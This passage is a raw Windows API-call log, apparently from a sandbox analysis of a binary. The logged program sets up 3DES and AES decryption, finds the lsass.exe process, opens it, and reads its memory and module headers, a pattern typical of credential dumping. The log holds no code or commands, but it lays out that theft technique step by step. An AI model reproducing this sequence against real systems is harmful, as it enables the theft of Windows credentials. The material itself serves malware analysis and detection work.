phAlgorithm=0x13f070980, pszAlgId="3DES", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x13f070980) returned 0x0 [0037.960] BCryptSetProperty (in: hObject=0x4bb4f0, pszProperty="ChainingMode", pbInput=0x13f06bd98, cbInput=0x20, dwFlags=0x0 | out: hObject=0x4bb4f0) returned 0x0 [0037.961] BCryptGetProperty (in: hObject=0x4bb4f0, pszProperty="ObjectLength", pbOutput=0x13f070998, cbOutput=0x4, pcbResult=0x31fb60, dwFlags=0x0 | out: pbOutput=0x13f070998, pcbResult=0x31fb60) returned 0x0 [0037.961] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.961] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.961] LocalAlloc (uFlags=0x40, uBytes=0x1fa) returned 0x4bb610 [0037.961] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x13f070940, pszAlgId="AES", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x13f070940) returned 0x0 [0037.962] BCryptSetProperty (in: hObject=0x4bbd80, pszProperty="ChainingMode", pbInput=0x13f06be00, cbInput=0x20, dwFlags=0x0 | out: hObject=0x4bbd80) returned 0x0 [0037.962] BCryptGetProperty (in: hObject=0x4bbd80, pszProperty="ObjectLength", pbOutput=0x13f070958, cbOutput=0x4, pcbResult=0x31fb60, dwFlags=0x0 | out: pbOutput=0x13f070958, pcbResult=0x31fb60) returned 0x0 [0037.962] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.962] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.962] LocalAlloc (uFlags=0x40, uBytes=0x26e) returned 0x4bbea0 [0037.962] RtlInitUnicodeString (in: DestinationString=0x31fbd0, SourceString="lsass.exe" | out: DestinationString="lsass.exe") [0037.964] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.964] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.964] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0x4bc120 [0037.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4bc120, Length=0x1000, ResultLength=0x0 | out: SystemInformation=0x4bc120, ResultLength=0x0) returned 0xc0000004 [0037.965] LocalFree (hMem=0x4bc120) returned 0x0 [0037.965] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.965] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.965] LocalAlloc (uFlags=0x40, uBytes=0x2000) returned 0x4bc120 [0037.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4bc120, Length=0x2000, ResultLength=0x0 | out: SystemInformation=0x4bc120, ResultLength=0x0) returned 0xc0000004 [0037.965] LocalFree (hMem=0x4bc120) returned 0x0 [0037.965] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.966] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.966] LocalAlloc (uFlags=0x40, uBytes=0x4000) returned 0x4bc120 [0037.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4bc120, Length=0x4000, ResultLength=0x0 | out: SystemInformation=0x4bc120, ResultLength=0x0) returned 0xc0000004 [0037.966] LocalFree (hMem=0x4bc120) returned 0x0 [0037.966] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.967] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.967] LocalAlloc (uFlags=0x40, uBytes=0x8000) returned 0x4bc120 [0037.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4bc120, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x4bc120, ResultLength=0x0) returned 0xc0000004 [0037.967] LocalFree (hMem=0x4bc120) returned 0x0 [0037.968] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.968] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.968] LocalAlloc (uFlags=0x40, uBytes=0x10000) returned 0x4bc120 [0037.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4bc120, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4bc120, ResultLength=0x0) returned 0x0 [0037.968] RtlEqualUnicodeString (String1=0x4bc158, String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="System", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="smss.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="csrss.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="wininit.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="csrss.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="winlogon.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="services.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0037.969] RtlEqualUnicodeString (String1="lsass.exe", String2="lsass.exe", CaseInsensitive=1) returned 1 [0037.969] LocalFree (hMem=0x4bc120) returned 0x0 [0037.969] OpenProcess (dwDesiredAccess=0x1010, bInheritHandle=0, dwProcessId=0x1c0) returned 0x60 [0037.969] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.969] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.969] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4bb820 [0037.970] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.970] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.970] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4b7e80 [0037.970] NtQueryInformationProcess (in: ProcessHandle=0x60, ProcessInformationClass=0x0, ProcessInformation=0x31f920, ProcessInformationLength=0x30, ReturnLength=0x31f990 | out: ProcessInformation=0x31f920, ReturnLength=0x31f990) returned 0x0 [0037.970] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fffffda000, lpBuffer=0x31fa00, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa00*, lpNumberOfBytesRead=0x0) returned 1 [0037.970] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x77202640, lpBuffer=0x31fb00, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fb00*, lpNumberOfBytesRead=0x0) returned 1 [0037.970] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1024a0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.970] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.971] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.971] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4baf10 [0037.971] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x102336, lpBuffer=0x4baf10, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.971] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0xffb00000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.971] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.971] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.971] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.971] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0xffb000f0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.972] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.972] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.972] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.972] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0xffb000f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.972] LocalFree (hMem=0x4baf30) returned 0x0 [0037.972] LocalFree (hMem=0x4bad20) returned 0x0 [0037.972] LocalFree (hMem=0x4baf10) returned 0x0 [0037.972] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x102590, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.972] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.972] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.972] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4baf10 [0037.972] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x771e53f8, lpBuffer=0x4baf10, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.973] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x770d0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.973] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.973] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.973] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.973] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x770d00e0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.973] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.973] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.973] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.973] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x770d00e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.974] LocalFree (hMem=0x4baf30) returned 0x0 [0037.974] LocalFree (hMem=0x4bad20) returned 0x0 [0037.974] LocalFree (hMem=0x4baf10) returned 0x0 [0037.974] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x102910, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.974] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.974] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.974] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0037.974] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1028e8, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0037.974] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76eb0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.974] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.975] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.975] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf10 [0037.975] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76eb00e8, lpBuffer=0x4baf10, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.975] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.975] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.975] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.975] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76eb00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.975] LocalFree (hMem=0x4baf10) returned 0x0 [0037.975] LocalFree (hMem=0x4bad20) returned 0x0 [0037.975] LocalFree (hMem=0x4b8320) returned 0x0 [0037.975] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x102a80, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.976] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.976] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.976] LocalAlloc (uFlags=0x40, uBytes=0x1e) returned 0x4b8320 [0037.976] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x102a58, lpBuffer=0x4b8320, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0037.976] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd260000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.976] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.976] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.976] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf10 [0037.976] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd2600f0, lpBuffer=0x4baf10, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.977] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.977] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.977] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.977] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd2600f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.977] LocalFree (hMem=0x4baf10) returned 0x0 [0037.977] LocalFree (hMem=0x4bad20) returned 0x0 [0037.977] LocalFree (hMem=0x4b8320) returned 0x0 [0037.977] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1037b0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.977] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.977] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.977] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4baf10 [0037.977] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x103788, lpBuffer=0x4baf10, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.978] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdf50000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.978] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.978] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.978] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.978] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdf500e8, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.978] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.978] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.978] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.978] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdf500e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.979] LocalFree (hMem=0x4baf30) returned 0x0 [0037.979] LocalFree (hMem=0x4bad20) returned 0x0 [0037.979] LocalFree (hMem=0x4baf10) returned 0x0 [0037.979] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1039e0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.979] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.979] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.981] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4baf10 [0037.981] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1039b8, lpBuffer=0x4baf10, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.981] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd650000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.981] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.981] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.981] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.981] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd6500f0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.981] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.982] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.982] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.982] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd6500f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.982] LocalFree (hMem=0x4baf30) returned 0x0 [0037.982] LocalFree (hMem=0x4bad20) returned 0x0 [0037.982] LocalFree (hMem=0x4baf10) returned 0x0 [0037.982] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x103ef0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.982] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.982] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.982] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf10 [0037.982] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x103ec8, lpBuffer=0x4baf10, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.983] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefce00000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.983] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.983] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.983] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.983] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefce000f0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.983] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.983] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.983] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.983] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefce000f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.984] LocalFree (hMem=0x4baf30) returned 0x0 [0037.984] LocalFree (hMem=0x4bad20) returned 0x0 [0037.984] LocalFree (hMem=0x4baf10) returned 0x0 [0037.984] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1177d0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.984] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.984] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.984] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4baf10 [0037.984] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1177a8, lpBuffer=0x4baf10, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.984] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcc90000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.984] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.985] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.985] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.985] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcc900e8, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.985] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.985] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.985] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.985] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcc900e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.985] LocalFree (hMem=0x4baf30) returned 0x0 [0037.985] LocalFree (hMem=0x4bad20) returned 0x0 [0037.985] LocalFree (hMem=0x4baf10) returned 0x0 [0037.985] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1178c0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.986] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.986] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.986] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf10 [0037.986] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117758, lpBuffer=0x4baf10, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.986] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdd90000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.986] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.986] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.986] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.986] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdd900e8, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.987] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.987] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.987] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.987] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdd900e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.987] LocalFree (hMem=0x4baf30) returned 0x0 [0037.987] LocalFree (hMem=0x4bad20) returned 0x0 [0037.987] LocalFree (hMem=0x4baf10) returned 0x0 [0037.987] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1175a0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.987] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.987] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.987] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf10 [0037.987] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117578, lpBuffer=0x4baf10, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.988] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcee0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.988] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.988] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.988] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.988] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcee00e8, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.988] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.988] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.988] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.988] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcee00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.989] LocalFree (hMem=0x4baf30) returned 0x0 [0037.989] LocalFree (hMem=0x4bad20) returned 0x0 [0037.989] LocalFree (hMem=0x4baf10) returned 0x0 [0037.989] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1179b0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.989] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.989] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.989] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0037.989] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117528, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0037.989] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefde20000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 